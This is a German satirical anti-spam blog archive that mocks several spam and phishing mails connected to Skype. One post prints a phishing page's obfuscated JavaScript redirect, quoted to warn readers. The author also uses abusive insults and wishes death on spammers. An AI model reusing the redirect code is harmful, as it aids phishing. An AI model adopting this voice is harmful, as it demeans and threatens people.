Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Schlagwortarchiv „Skype“

Предложение

Freitag, 25. September 2020

Nein, diese wunderschöne Sprache habe ich nicht gelernt. Ich würde noch nicht einmal über diese Spam schreiben, wenn ich sie nicht mit der monotonen Routine einer Wasserfolter empfangen würde. Sie kommt alle zwei Tage, wird jedesmal sicher als Spam erkannt und automatisch in das Glibbersieb geschoben. Vermutlich wird kaum jemand diese Spam zu Gesicht bekommen. Aber sie kommt alle zwei Tage, und da habe ich sie mir dennoch mal angeschaut. 📬

An: gammelfleisch@tamagothi.de

Diese Spam geht also an jede Mailadresse, die man einfach und bequem mit einem schlechten Skript im Web einsammeln kann.

Здравствуйте. У меня есть предложения для владельца сайта. Передайте пожалуйста мои предложения и контакты руководству, которые указаны в прикрепленных файлах.

Nein, diese Sprache verstehe ich immer noch nicht.

Hello. I have suggestions for the site owner.
Please pass on my suggestions and contacts to the management, which are indicated in the attached files.

Aber das verstehe ich. Der Spammer sagt: Hallöchen, ich habe Vorschläge, aber die kann ich nicht in den Mailtext schreiben, deshalb habe ich Anhänge gemacht. Leite die mal bitte ans Management weiter! Da ist man sicherlich dumm genug dafür. 🐵

Moment, wo ist denn mein Management? 🤔

Es handelt sich um insgesamt vier Anhänge…

$ ls -lh *.docx
-rw-rw-r-- 1 elias elias 16K Sep 25 11:56 Offer - contextual advertising.docx
-rw-rw-r-- 1 elias elias 17K Sep 25 11:56 Offer.docx
-rw-rw-r-- 1 elias elias 19K Sep 25 11:56 Предложение.docx
-rw-rw-r-- 1 elias elias 18K Sep 25 11:56 Предложение - контекстная реклама.docx
$ _

…allesamt im Dateiformat von Microsoft Word. So etwas sollte man auf gar keinen Fall aufmachen, wenn es mit einer E-Mail kommt. Selbst, wenn man glaubt, den Absender zu kennen, ist es eine gute Idee, vorher anzurufen und zu fragen, ob die Mail wirklich von ihm ist. Die Absenderadresse einer E-Mail kann beliebig gefälscht werden. Neben dem Webbrowser gibt es kaum etwas anderes, was so häufig Schadsoftware auf Computer befördert wie Dokumente für Microsoft Office, die als Mailanhang versendet werden. Die Idee, jedes kleine Textdokument oder Tabellchen mit Makro-Fähigkeiten so mächtig wie eine Anwendung für Microsoft Windows zu machen, war wohl die schlechteste Idee, die Microsoft jemals hatte. Und die hatten wirklich viele Ideen, die nicht besonders gut waren. 😠

Deshalb: Macht niemals, niemals, niemals Office-Anhänge in einer E-Mail auf! Auch nicht, wenn ihr ein Antivirus-Programm habt! Dettelbach ist überall! 🛑

Für Menschen, die gern lachen, habe ich die englischsprachigen Anhänge kurzerhand in PDFs umgewandelt, die man wenigstens für seinen Computer gefahrlos öffnen kann – von den Gefahren für den Verstand will ich lieber nicht reden:

Natürlich habe ich die Wanz­Äpp- und Skype-Kontaktangaben in den Dokumenten unlesbar gemacht, ich werde ja nicht so gern Dateihoster für einen Spammer. Die Formatierung ist völlig unverändert. Ja, die Anhänge sehen wirklich so schlecht aus. Ja, der hat sich wirklich überhaupt keine Mühe in irgendeiner Form gegeben. Ist ja auch klar: Wenn er sich Mühe geben wollte, könnte Aleksander auch gleich arbeiten gehen und brauchte nicht zu spammen. 🛠️

Aber will ich mal nicht ganz so laut meckern, immerhin scheint er das Englisch selbst geschrieben zu haben. Es klingt nicht so gaga und dada wie eine dumme Computerübersetzung. Das ist schon mehr, als ich von einem Spammer erwarte.

Das Folgende ist ein kommentiertes Vollzitat von Offer.docx:

Hello. Would you like to increase the number of targeted visitors to the site with Google and Yandex search by promoting the site?

Nein, ich schreibe nicht für „Zielgruppen-Besucher“, ich schreibe für Leser. Ich betrachte Menschen nicht durch ein Fadenkreuz, so wie jene Feinde, die von Zielgruppen faseln. 🎯

My name is Alexander. Over 9 years professionally engaged in website promotion.

Schön, dass du einen Namen hast, Spammer! Und dass du ein paar Tage gearbeitet hast… ähm… professionell engagiert warst. In Reklame für Websites. Das muss ein toller Job sein, irgendwie die Leute zu Websites zu treiben, zu denen sie nicht allein kommen, sondern hingestubst werden müssen. Bist du dabei zu einem dieser Durchfalltrinker geworden, die jede Mailadresse mit Spam zuscheißen? 🚾

There is a portfolio with examples of work and reviews.

So schade, dass in deinem vierseitigen Dokument und in einer E-Mail mit insgesamt vier Anhängen kein Platz mehr dafür war! Vermutlich war dein Mail- und Textverarbeitungspapier alle. 📜

Tja, und eine Website scheinst du Website-Spezialexperte auch nicht zu haben, denn sonst hättest du die sicherlich verlinkt. 🎃

I will be very glad to cooperate with you.

Und mir wäre es ein Vergnügen, auf dein Grab zu scheißen! ⚰️💩

Write your WhatsApp / Viber.
My WhatsApp /Viber: +38097351■■■■
My Skype: may■■■■■■_aleks

Voll der krasse Website-Experte! Hat leider keine verlinkbare Website und fälscht seine Absenderadresse! Stattdessen kommuniziert man mit ihm über Microsofts Skype oder über Facebooks Wanz­Äpp. Der kann ganz sicher etwas! 🎓

Benefits in working with me:

1. Increase the conversion of your site by 2-3 times or more.
2. Increase in target audience by 2-3 times and higher.
3. Since I work on my own, and not in a company, my cost is much lower than what companies charge.
4. Payment upon the work, did the work – paid.
5. You will have more time and energy left, as I undertake all the work of attracting clients.
6. The growth of the site’s position on targeted requests in the first month of operation
7. Reports on each step of the work and assistance on issues of website promotion and optimization.

Eines kann Aleksander allerdings nicht, und das ist mit einer Textverarbeitung umzugehen. Sonst hätte er auf das Piktogramm für eine Aufzählung geklickt, um eine formatierte Aufzählung zu machen, statt einfach immer Zahlen vorweg zu schreiben. Aber er ist ja auch Spezialexperte für Websites, nicht für Textverarbeitung.

Was habe ich denn für Vorzüge?

  1. Meine Website wird doppelt bis dreifach so häufig „konvertiert“, also meine Leser kaufen mir doppelt bis dreifach so häufig irgendwelchen Kram ab, den ich gar nicht verkaufe.
  2. Ich kriege eine doppelt bis dreifach so hohe Aufmerksamkeit durch meine Zielgruppe, obwohl ich gar keine habe.
  3. Weil Aleksander für sich selbst arbeitet (das Dokument lässt erahnen, wie gut er das tut), ist er viel preiswerter als die Rechnung eines Bullshit-Unternehmens für SEO-Magie und Suchmaschinenspam, das ich gar nicht brauche.
  4. Wenn man Aleksander Geld gibt, arbeitet er, und es ist damit bezahlt. Echt jetzt!
  5. Ich habe viel mehr Kraft und freie Lebenszeit, um mich langweilen zu können, weil Aleksander für mich die ganze Arbeit erledigt, irgendwelche Kunden anzuziehen, die ich nicht habe, weil ich nichts verhökere.
  6. Im ersten Monat wächst die Position der Website bei gezielten Suchanfragen. Schade, dass sie nicht steigt.
  7. Jede Menge lustige Zahlen über die Arbeit und ihren Erfolg, sowie volle Unterstützung bei Spam, Spam und Spam.

Und, wie will Aleksander arbeiten? Soll ich ihm etwa die Zugangsdaten für den Webserver über Wanz­Äpp zustecken, weil er so schöne Spam schreibt? Da müsste ich aber richtig hirnverbrannt sein. 🤕

Dazu schweigt Aleksander. Erstmal. Stattdessen erklärt er mir, was alles zu seiner tollen Dienstleistung gehört. 🤡

What is included in the service:

1. Compilation of the semantic core (list of keywords on the subject of the site).

2. Analysis of the site for errors and their correction and optimization for key phrases.

3. Search and purchase of high-quality links to your site directly from site owners who do not sell links to exchanges to everyone, which will make it possible to get the maximum link weight and not risk being sanctioned for bad links purchased through exchanges and aggregators.

Es sind nur drei Tätigkeiten:

  1. Zusammenstellung des „semantischen Kerns“ durch Entfernen jeglichen Textes, bis nur noch die Schlüsselwörter übrig bleiben. Fürwahr, hier schreibt ein ganz besonderer Literaturgenießer! 📚
  2. Verwendung eines Standardprogramms, um Fehler in der Website zu erkennen, Korrektur der Fehler und Umstellung der Website auf ein Produkt, das sich nicht mehr an Leser, sondern an die Indexer der Suchmaschinen richtet. 🤖
  3. Spammige Suchmaschinenmanipulation durch semantisch sinnlose Spamlinks auf allen möglichen Websites. 🚽

Fürwahr, hier schreibt ein Spammer, der die Welt wie ein Spammer betrachtet – und versucht, mit aufgedunsenen Phrasen den Anschein zu erwecken, er hätte wenigstens ein bisschen erfreuliche Kultur. Leider reichen seine gespammten Kommunikationsversuche nur als Ziehungsgerät für das Bullshit-Bingo. Da ist Aleksander allerdings eine sehr gute Gewinnchance. 🍀

Wer darauf reinfällt…

Promotion cost:

40$ / Month for work + 80$ / Month cost of 50-70 links to your site = 120$/ Month total cost of promotion.

…gibt dem Spammer fürs Spammen hundertzwanzig Dollar. 💸

Ich hoffe mal, Aleksander kann auch wechseln:

Banknote aus der Hyperinflation in Zimbabwe: Hundert Billionen Dollar

Keine Sorge, das ist völlig risikolos:

But so that you do not take risks, I do not take payment in advance, so we can divide 120$ into 3 work steps (which are written above) 40$ = 1 step, only 3 work steps. From the second month, payment will be immediately 120$ per month.

Aleksander nimmt keine Vorkasse. Man muss nur einem Spammer Zugriff auf einen Webserver geben. Was kann dabei schon schiefgehen? 🤦

Promotion terms:

The effect in the form of rising positions will be visible throughout the month. Terms of site promotion in the top 3 for all requests = 5-7 months.

Further, when the site will be in the top 3, it is no longer necessary to promote it, since the position is maintained thanks to behavioral factors and regular transitions from the search to the site upon request.

Once a year, you can do position analytics, and if some drops were noticeable, you can restore promotion and optimization for a month to correct problems and return positions to the top 3.

Aleksander bringt jede Website ganz nach oben in den Suchmaschinen, egal, ob sie über das Geschlechtsleben von Nacktmullen, das gesunde Kochen mit Ätznatron und Dosenmilch oder über Spam schreibt. Nach nur einem Jahr und der feierlichen Verbrennung von 1.440 Dollar kann man sich sogar mal anschauen, wie erfolgreich das war. 🕵️

Detailed promotion plan:

1 step. I compose a complete semantic core of queries.
A list of requests for which you can and should promote your site in search. And by which people can find your site by driving these requests into the search bar Google or Yandex.

2 step. I will analyze the site for technical errors.
This will allow you to identify errors on the site that may interfere with the promotion. Errors can be contained in the code of the site or page, errors in the script, broken, broken links (when your site links to another site or page that does not exist).

External links that are not open from indexing to other people’s sites, improper linking or lack thereof, improperly distributed site weights, when a page is unnecessary for promotion, receives the most weight, and the pages you need receive very little weight from the entire site.

3 step. I do a search and purchase of quality links to your site.
When the site is fully optimized, it has the right content, with the optimal volume, the required entries, then it is advisable to start the external promotion of the site – the purchase of high-quality links to the site.

I will begin a step-by-step and gradual purchase of rental links to your site with the necessary anchors taken from the semantic core of requests.

This will allow you to raise your site to the top 3 according to your needs, increase traffic and convert your visitor into a permanent customer of your goods and services.

4 step. Continuous technical support and reporting.
This allows you to ask your question on Skype at any time, as well as see what I have done for a specific period, for example, day, week, month.

I provide reports on what and where links to your site were purchased, what are the errors on the site that need to be fixed, see the real growth of the site’s position and much more.

Aleksander geht in vier Schritten vor:

  1. Eindampfen des Inhaltes der Website auf Schlüsselwörter;
  2. Überprüfung der Website mit Software, die technische Fehler aufspürt;
  3. Suchmaschine benutzen, um den Erfolg seiner Maßnahmen zu überprüfen; und
  4. Bullshitberichte absondern und natürlich ständig über Skype zur Verfügung stehen, damit man ihn fragen kann, wie es jetzt aussieht und nicht selbst eine Web-Suchmaschine benutzen muss, um den Erfolg von Aleksanders Tätigkeiten zu überprüfen.

Ansonsten wiederholt sich Aleksander gern ein bisschen, damit sein Geschwafel nach mehr aussieht, als es ist, denn er richtet sich ja an Menschen, die kein technisches Verständnis haben. Deshalb soll man seine Spam ja auch ans Management weiterleiten. 😂

Natürlich weiß man im Management nicht…

My WhatsApp /Viber for fast communication: +38097351■■■■
My Skype: may■■■■■■_aleks

…dass man mit dem Rollbalken im Anzeigefenster zurückscrollen kann und deshalb wiederholt Aleksander jetzt noch einmal, wie man ihn erreichen kann: Nicht, in dem man auf die E-Mail antwortet, sondern, indem man Wanz­Äpp oder Skype benutzt. ☎️

Wie man – zum Beispiel durch Einfügen einer Fußzeile im Dokument – dafür sorgen könnte, dass Kontaktdaten auf jeder Seite seines Dokumentes sichtbar sind, lernt er leider erst nächstes Jahr in seinem Kurs „Textverarbeitung für Arbeitsscheue, Lernunwillige und hirnloses Gekrepel“. Bis dahin muss er sich mit solchen Wiederholungen behelfen, der…

Sincerely, Alexander, SEO specialist in the field of website promotion.

…hochachtungsvoll grüßende SEO-Spezialexperte in den weiten, unerforschten Gebieten der Website-Promotion. 👋

Aber so ein toller Spezialexperte! 🏆

Gesponserter Artikel auf tamagothi

Dienstag, 25. Februar 2020

Nein! 💔

Von: Monica Chereji | ZZB Agency <monica.chereji@zzbagency.com>

Kenne ich nicht. 👤

Hallo,

Genau mein Name! 👏

mein Name ist Monica. Ich bin der Outreach-Assistent bei der ZZB Agency Agentur. Wir sind ein kleines Unternehmen, das vorwiegend Kunden aus dem Glücksspielbereich vertritt.

Schön, dass wenigstens du einen Namen hast, „Monica“. Und einen sehr seriösen Job: Spammende Abzockergehilfin für windige Online-Zockhöllen mit gebremster Empathieentwicklung. 🎰

Mein Tipp, „Monica“: Versuch es nach deinem völlig verpfuschten, asozialen Leben einfach mal mit Sterbengehen. Du tätest damit dir und deiner Mitwelt einen riesen Gefallen, und die Luft würde vermutlich auch gleich ein bisschen besser riechen. Der Tod macht auch aus dem unerfreulichsten Charakter noch guten und nützlichen Kompost. 🧟

Wir suchen nach interessierten Partnern für unsere Content-Marketing-Kampagnen. Dabei ist mir ihre Webseite aufgefallen, die für unsere Kunden von Interesse wäre.

Aha. Aber das Impressum hast du auf meiner Website nicht gefunden, du stinkende „Monica“ in Wir-Form, denn sonst wüsstest du eine bessere Anrede als „Hallo“ für mich. 👎

Bitte erlauben Sie mir die Frage, ob Sie auf Ihrer Webseite einen Artikel mit Do-Follow-Link zu Glücksspielanbietern veröffentlichen würden. Natürlich würden wir dafür bezahlen. Die Verlinkung würde dabei zum Beispiel auf Blogbeiträge erfolgen, die sich mit ähnlichen Inhalten wie ihre Webseite beschäftigen.

Nein. 🤮

Es gibt für mich exakt einen Grund, einen Link zu setzen: Die Nützlichkeit des Links für meine Leser im Kontext eines Textes. Und wenn ich ein Produkt verlinke, dann verlinke ich nur eines, von dessen Qualität und Nützlichkeit ich selbst völlig überzeugt bin. Meiner Handvoll Leser komme ich ganz sicher nicht mit einem ungekennzeichneten Reklamelink auf windige, illegale Online-Casinos, weil mir ein Spammer dafür Geld angeboten hat. Ein Link ohne Nofollow-Attribut soll darüber hinaus in erster Linie den Zweck erfüllen, die Indizes von Suchmaschinen vollzuspammen, damit die Menschen nicht mehr finden, was sie suchen, sondern was irgendwelche SEO-Spammer sie finden lassen wollen. Für dieses Anliegen habe ich nichts als tiefe Verachtung übrig. Und diese Verachtung strahlt auf jeden Menschen aus, der mich zum Hilfsspammer machen will. 💩

Meinen Lesern empfehle ich übrigens immer wieder einmal die Verwendung einer besseren Suchmaschine als Google, um nicht bei der Websuche schon von Spammern bestupst zu werden. Google ist ein riesengroßes SEO-Spamklo, und jeder asoziale Spamkopf aus Verbrechen und Wirtschaft hat da schon einmal reingeschissen. 🚾

Wenn du so tolle Artikel hast, „Monica“, warum machst du nicht einfach selbst eine Website auf und veröffentlichst sie dort. Das ist nicht schwierig. Wenn du zu doof dazu bist, weil du das Internet bislang nur zum Spammen verwenden wolltest, bringe ich dir auch gern bei, wie man so eine Website macht. Das ist nämlich wirklich nicht schwierig. Ach, deine tollen Artikel sind gar nicht so toll? Ach, da würde sich in Wirklichkeit kein Toter für interessieren? Ach, deshalb willst du lieber auf Websites veröffentlichen, die schon eine gewisse Reputation haben? Ach, du lügst mich die ganze Zeit einfach nur an und winkst mit ein paar Klickegroschen, weil du davon ausgehst, dass ich beim Gedanken an Geld sofort mein Gehirn abschalte und meine paar Leser an irgendwelche Spammer verkaufe? Komm, „Monica“, geh spielen! Auf der Autobahn! 👿

Mir ist durchaus bewusst, dass eine Verlinkung in diesem Bereich sensibel ist. Aus diesem Grund sind wir bereit höhere Raten als üblich zu bezahlen. Sollten Sie für eine Zusammenarbeit offen sein, bitte ich Sie, mir ihren Preis für eine solche Verlinkung (Do-Follow) mitzuteilen. Bitte teilen Sie mir dabei auch den Preis für die Erstellung des Artikels mit. Auf Wunsch kann dieser auch von uns erstellt werden.

So so, „höhere Raten als üblich“ bei Nichtnennung der üblichen Preise. Das ist wohl einer dieser Rhetoriktricks aus der Betrügerschule. 😂

Diese Verlinkung auf ein klar illegales Angebot von illegalen Glücksspielen ist nicht nur „sensibel“, sondern zieht in der Bundesrepublik Deutschland mit ihrer Linkhaftung unter Umständen hohe Rechtskosten nach sich. Aber das erzählst du den Deppen, die du mit dieser Spam fangen willst, lieber nicht, stattdessen winkst du mit dem Geldsack. 💰

Unser Team spricht Englisch, aber nicht Deutsch. Aus diesem Grund möchte ich Sie bitten, mir auf Englisch zu antworten, wenn dies möglich ist. Unsere einzige andere Option wäre die Verwendung von Google Translate, und wir alle wissen, dass es nicht so genau ist, wie es sein sollte.

Tja, dann benutz halt was anderes, „Monica“! Ich finde DeepL jedenfalls deutlich besser als Google, und generell meide ich Google-Dienste aus Gründen. Dass du hingegen völlig offen zugibst, einen Großteil deiner „geschäftlichen“ Korrespondenz an die größte privatwirtschaftliche Überwachungs- und Datensammel-Unternehmung der Welt weiterzugeben, weil dir die (steuerlich absetzbaren) paar Euro zwanzig für einen richtigen Dolmetscher zu teuer sind, offenbart, wie auszeichnungswürdig seriös du bist. 🏅

And finally: If you don’t speak German, you can simply write to people in English. Every educated person in Germany can speak some English. It makes a much better impression than a German-language mail that asks for an answer in English because you are too stingy for an interpreter. Ach, der Eindruck ist dir egal? Du hast dich eh für illegale und asoziale Spam entschieden und erzählst gleich einen vom illegalen Glücksspiel? Na, dann ist ja alles gut. 🤡

Ich bedanke mich im Voraus für Ihre Antwort und freue mich auf eine eventuelle Zusammenarbeit.

Ich bedanke mich im Nachhinein für deinen „Dank für Nichts“ und deine damit so billig und verachtungsvoll simulierte Höflichkeit, die so überaus deutlich macht, dass dir wesentliche zivilisatorische Werte viel zu hastig verabreicht wurden. 🖕

Mit freundlichen Grüßen

Monica Chereji
Outreach Assistant
ZZB Agency
Skype: live:isxxxx_323

Mit spammigen Grüßen 👋

Deine durchfalltrinkende Allerweltsspammerin
Titel für den Job des Spammers
Firmierung der „Webagentur“, die keine Website hat
„Monica“ kann natürlich auch während ihrer Arbeitszeit skypen. Aber eine Anschrift hat die Unternehmung, für die sie so eifrig Menschen anspammt, leider nicht. Eine richtige Telefonnummer auch nicht. Eine Website auch nicht. Und der Name wird auch nicht stimmen. Also der Vorname jetzt. Und der Nachname. Und die Firmierung. Aber immerhin, Skype geht. Über ein Handle, dem schon eine laufende Nummer angehängt wurde, obwohl es nicht an einen häufigen Namen erinnert. Vermutlich tut wenigstens Microsoft etwas für die Bekämpfung von Spam und Internetkriminalität. Ich glaube, ich schreibe jetzt gleich mal die Abuse-Mail, das scheint bei Microsoft ja doch etwas mehr Sinn als bei Google zu haben… 😉

Hi Elias Schwerdtfeger Delayed message

Samstag, 30. November 2019

Hui, dieser freundliche Idiot aus dem Spamfilter kennt sogar meinen Namen und schreibt ihn gleich in den Betreff rein, statt mir zu sagen, um was es geht. Er glaubt, damit ein bisschen Aufmerksamkeit zu bekommen. Wie man an diesem Posting sieht, ist ihm das sogar gelungen.

TheSkypeTeam <giuga@tieffeinfo.it>

Aha, „das Skype-Team“ benutzt irgendwelche Mailadressen in irgendwelchen Domains. So ein Jammer aber auch, dass Microsoft sich für sein Skype keine eigene Domain leisten kann. 😀

Skype

Delayed message.

View messages

Respectfully
Skype support
© SkypeTeam.

Ja ja, sehr respektvoll! 🖕

So so, da hat sich also eine angebliche Skype-Nachricht für mich verzögert, und deshalb soll ich jetzt in eine E-Mail klicken, was immer eine ganz schlechte Idee ist. Der Link geht natürlich nicht zu Skype, sondern in das Upload-Verzeichnis eines gecrackten WordPress-Blogs, damit man schon vorher weiß, womit man es zu tun hat: Mit Irreführung, Spam und Kriminalität.

Übrigens benutze ich Skype nicht und habe folglich auch keinen Account. Wenn ich chatten will, finde ich offene Standards wie IRC und XMPP völlig hinreichend und bedarf nicht des Angebotes einer Unternehmung aus einem Überwachungsstaat, die von Rechts wegen zur Kooperation mit den Geheimdiensten dieses Überwachungsstaates gezwungen ist.

Der Link scheint auch ein bisschen giftig zu sein, denn er führt zu einer vorsätzlich kryptisch formulierten Javascript-Weiterleitung:

$ lynx -mime_header http://bmi.ltd/wp-content/themphp
HTTP/1.1 200 OK
Date: Sat, 30 Nov 2019 12:00:19 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>panting32517 Harlequin, remains hut andmoney - blessd, nervous reaping, infants posterity flutterd, read.</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
</head>
<body>
<script type="text/javascript">

function flu(fowls)
{
	roys = liberty / mold;
	beyond = name * taking;
	hot = grasped + polity;
}

function greetinge(agreetinge)
{
	return String.fromCharCode(agreetinge);
}

function unhearda(hadni)
{
	return 2;
}

function starsd()
{
	window.location.href = whipc();
}

starsd();

function whipc()
{
	awhipc = unhearda();
	bwhipc = [106,118,118,114,60,49,49,118,99,109,103,114,116,107,124,103,117,106,103,116,103,51,48,110,107,104,103,49,65,119,63,123,52,123,109,99,103,121,40,113,63,52,122,119,114,58,59,116,40,111,63,51,40,118,63,103,111,110,111,112,117];

	return tellsb(awhipc,bwhipc);
}

function tellsb(atellsb,btellsb)
{
	ctellsb = "";

	for (dtellsb = 0; dtellsb < btellsb.length; dtellsb++)
	{
		etellsb = btellsb[dtellsb];
		ftellsb = etellsb - atellsb;
		gtellsb = greetinge(ftellsb);
		ctellsb = ctellsb + gtellsb;
	}

	return ctellsb;
}

</script>
</body>
</html>
$ _

Ich untersuche jetzt nicht weiter, wo diese Reise hingeht, aber dass von Leuten, die so einen Mummenschanz nötig haben, nichts Gutes zu erwarten ist, sollte eigentlich jedem Menschen klar sein.

Deshalb klickt man ja auch nicht in eine E-Mail. Wer stattdessen einfach die Skype-Website aufgerufen hätte und sich dort ganz normal angemeldet hätte, hätte sofort bemerkt, dass es keine „verzögerten Nachrichten“ gibt. Und damit vermutlich einen Angriff auf seinen Computer abgewehrt.

tamagothi.de and NordVPN partnership

Mittwoch, 22. Februar 2017

Da weiß ich ja noch gar nichts von… 😀

Hello,

Mal wieder genau mein Name.

It‘s Gintare, from nordvpn.com.

Du hast auch einen Namen. Den habe ich noch nie gehört. Und weil du selbst merkst, dass das ein bisschen blöd ist, einfach „Hier ist Kaspar“ zu sagen, hast du noch einen Link auf eine Webseite in der Domain t (punkt) yesware (punkt) com hinterlegt, die mir ohne Javascript, also mit einem im Zeitalter der Internetkriminalität leidlich abgesicherten Webbrowser, nichts als eine weiße Seite zeigt…

$ lynx -mime_header http://t.yesware.com/tt/cf09f20e624e50f70622257ab772733ccb22436b/050fb9cd4a890cb497846a0f5cf48808/209acfc13d557406a1541a5d72e2e554/www.nordvpn.com
HTTP/1.1 200 OK
Server: Cowboy
Connection: close
Date: Wed, 22 Feb 2017 11:43:13 GMT
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 4775
X-Ua-Compatible: IE=Edge,chrome=1
Set-Cookie: t=YKacprAejwqHiVY2u0wywA; domain=.yesware.com; path=/; expires=Mon, 22-Feb-2027 11:43:13 GMT
X-Request-Id: b1515cd1-ab5a-4044-af8d-7413a6826930
X-Runtime: 0.006077
X-Rack-Cache: miss
Via: 1.1 vegur

<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","errorBeacon":"bam.nr-data.net","licenseKey":"1a5da492d2","applicationID":"2164051","transactionName":"Il9eRkQKCVtSERkICA9bH1FaDAZc","queueTime":3,"applicationTime":6,"agent":""}</script>
<script type="text/javascript">window.NREUM||(NREUM={}),__nr_require=function(e,t,n){function r(n){if(!t[n]){var o=t[n]={exports:{}};e[n][0].call(o.exports,function(t){var o=e[n][1][t];return r(o||t)},o,o.exports)}return t[n].exports}if("function"==typeof __nr_require)return __nr_require;for(var o=0;o<n.length;o++)r(n[o]);return r}({1:[function(e,t,n){function r(){}function o(e,t,n){return function(){return i(e,[(new Date).getTime()].concat(u(arguments)),t?null:this,n),t?void 0:this}}var i=e("handle"),a=e(2),u=e(3),c=e("ee").get("tracer"),f=NREUM;"undefined"==typeof window.newrelic&&(newrelic=f);var s=["setPageViewName","setCustomAttribute","setErrorHandler","finished","addToTrace","inlineHit","addRelease"],l="api-",p=l+"ixn-";a(s,function(e,t){f[t]=o(l+t,!0,"api")}),f.addPageAction=o(l+"addPageAction",!0),f.setCurrentRouteName=o(l+"routeName",!0),t.exports=newrelic,f.interaction=function(){return(new r).get()};var d=r.prototype={createTracer:function(e,t){var n={},r=this,o="function"==typeof t;return i(p+"tracer",[Date.now(),e,n],r),function(){if(c.emit((o?"":"no-")+"fn-start",[Date.now(),r,o],n),o)try{return t.apply(this,arguments)}finally{c.emit("fn-end",[Date.now()],n)}}}};a("setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","),function(e,t){d[t]=o(p+t)}),newrelic.noticeError=function(e){"string"==typeof e&&(e=new Error(e)),i("err",[e,(new Date).getTime()])}},{}],2:[function(e,t,n){function r(e,t){var n=[],r="",i=0;for(r in e)o.call(e,r)&&(n[i]=t(r,e[r]),i+=1);return n}var o=Object.prototype.hasOwnProperty;t.exports=r},{}],3:[function(e,t,n){function r(e,t,n){t||(t=0),"undefined"==typeof n&&(n=e?e.length:0);for(var r=-1,o=n-t||0,i=Array(o<0?0:o);++r<o;)i[r]=e[t+r];return i}t.exports=r},{}],ee:[function(e,t,n){function r(){}function o(e){function t(e){return e&&e instanceof r?e:e?c(e,u,i):i()}function n(n,r,o){if(!p.aborted){e&&e(n,r,o);for(var i=t(o),a=v(n),u=a.length,c=0;c<u;c++)a[c].apply(i,r);var f=s[w[n]];return f&&f.push([y,n,r,i]),i}}function d(e,t){b[e]=v(e).concat(t)}function v(e){return b[e]||[]}function g(e){return l[e]=l[e]||o(n)}function m(e,t){f(e,function(e,n){t=t||"feature",w[n]=t,t in s||(s[t]=[])})}var b={},w={},y={on:d,emit:n,get:g,listeners:v,context:t,buffer:m,abort:a,aborted:!1};return y}function i(){return new r}function a(){(s.api||s.feature)&&(p.aborted=!0,s=p.backlog={})}var u="nr@context",c=e("gos"),f=e(2),s={},l={},p=t.exports=o();p.backlog=s},{}],gos:[function(e,t,n){function r(e,t,n){if(o.call(e,t))return e[t];var r=n();if(Object.defineProperty&&Object.keys)try{return Object.defineProperty(e,t,{value:r,writable:!0,enumerable:!1}),r}catch(i){}return e[t]=r,r}var o=Object.prototype.hasOwnProperty;t.exports=r},{}],handle:[function(e,t,n){function r(e,t,n,r){o.buffer([e],r),o.emit(e,t,n)}var o=e("ee").get("handle");t.exports=r,r.ee=o},{}],id:[function(e,t,n){function r(e){var t=typeof e;return!e||"object"!==t&&"function"!==t?-1:e===window?0:a(e,i,function(){return o++})}var o=1,i="nr@id",a=e("gos");t.exports=r},{}],loader:[function(e,t,n){function r(){if(!h++){var e=y.info=NREUM.info,t=l.getElementsByTagName("script")[0];if(setTimeout(f.abort,3e4),!(e&&e.licenseKey&&e.applicationID&&t))return f.abort();c(b,function(t,n){e[t]||(e[t]=n)}),u("mark",["onload",a()],null,"api");var n=l.createElement("script");n.src="https://"+e.agent,t.parentNode.insertBefore(n,t)}}function o(){"complete"===l.readyState&&i()}function i(){u("mark",["domContent",a()],null,"api")}function a(){return(new Date).getTime()}var u=e("handle"),c=e(2),f=e("ee"),s=window,l=s.document,p="addEventListener",d="attachEvent",v=s.XMLHttpRequest,g=v&&v.prototype;NREUM.o={ST:setTimeout,CT:clearTimeout,XHR:v,REQ:s.Request,EV:s.Event,PR:s.Promise,MO:s.MutationObserver},e(1);var m=""+location,b={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",agent:"js-agent.newrelic.com/nr-1016.min.js"},w=v&&g&&g[p]&&!/CriOS/.test(navigator.userAgent),y=t.exports={offset:a(),origin:m,features:{},xhrWrappable:w};l[p]?(l[p]("DOMContentLoaded",i,!1),s[p]("load",r,!1)):(l[d]("onreadystatechange",o),s[d]("onload",r)),u("mark",["firstbyte",a()],null,"api");var h=0},{}]},{},["loader"]);</script>
    <script type="text/javascript">
    window.onload = function() {
    var destinationUrl = "http://www.nordvpn.com";
    var fragment = window.location.hash;

    window.location = destinationUrl + fragment;
};

  </script>

  <meta name="robots" content="noindex" />
</head>
<body>
</body>
</html>
$ _

…weil du die Verwendung von HTML aus nicht nachvollziehbaren Gründen ablehnst. Damit diese deine Zumutung noch ein bisschen lächerlicher wirkt, handelt es sich einfach um eine mit vorsätzlich kryptisch formulierten Tracking-Zeug „angereicherte“ Weiterleitung in die Domain, die du in deinem Linktext sowieso benannt hast, so dass man sich fragt, warum du nicht einfach direkt verlinkst. Vermutlich liegt es daran, dass…

Checking www.tamagothi.de – obvious that privacy and security is super-important for your vistors.

…du bei deinen Spamnummern immer Websites checkst, bei denen es offensichtlich ist, dass Privatsphäre und Computersicherheit ganz besonders interessant und wichtig für Autor und Besucher sind. :mrgreen:

Schön, damit hätten wir geklärt, dass du ein Vollidiot bist. Eigentlich war das schon bei deiner Spam klar. Und was willst du jetzt von mir?

By reffering [sic!] your visitors to our security solution in form of:
1. an article;
2. product review;
3. banner, etc.
you will get commissions (up to 100%) for every sale you made.

Ah ja, du willst, dass ich meine Leser an einen Spammer verhökere, indem ich ungekennzeichnete Reklame (einen Artikel) für bislang in der Spam völlig ungenannte Produkte mache, weil mir das ein illegaler und asozialer Spammer in einer Spam an eine Honigtopfadresse zusammen mit einen Link auf eine mit sicherem Webbrowser nicht darstellbare Website angeboten hat. Im Lande der Linkhaftung kann das für mich schnell teuer werden, denn das, was ein Spammer anzubieten hat, wird nicht legal sein. Sonst müsste er ja auch nicht spammen.

